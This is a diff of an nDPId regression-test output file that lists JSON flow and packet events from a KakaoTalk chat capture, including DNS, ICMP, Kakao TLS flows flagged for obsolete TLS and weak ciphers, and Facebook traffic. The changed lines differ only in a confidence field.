00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB7lMANQAt50i5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"thread_ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBEUGwoYUrwKvL8B7lMANQAtKUi5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1430069030115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":119,"pkt_l4_len":83,"thread_ts_msec":1430069030115,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGccBgAANREA8Aq8AQEKGFK8ADXuUwBTwyO5OoGAAAEAAgAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAHYwAKBHBsdXMCZ2zAFsAxAAEAAQAAAQkABNJn8A8="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030115,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030115,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069030119,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":119,"pkt_l4_len":83,"thread_ts_msec":1430069030119,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGf90QAANRFhIwq8vwEKGFK8ADXuUwBTEye5OoGAAAEAAgAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAADlQAKBHBsdXMCZ2zAFsAxAAEAAQAAAMkABNJn8A8="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069030119,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":147,"pkt_l4_len":111,"thread_ts_msec":1430069030119,"pkt":"AAQCEgAAAAAAAAAAAAAIAEXAAIMZuAAAQAE5cQoYUrwKvL8BAwMj8wAAAABFAABn\/dEAADURYSMKvL8BChhSvAA17lMAUxMnuTqBgAABAAIAAAAACXBsdXMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAAA5UACgRwbHVzAmdswBbAMQABAAEAAADJAATSZ\/AP"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":140000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="} 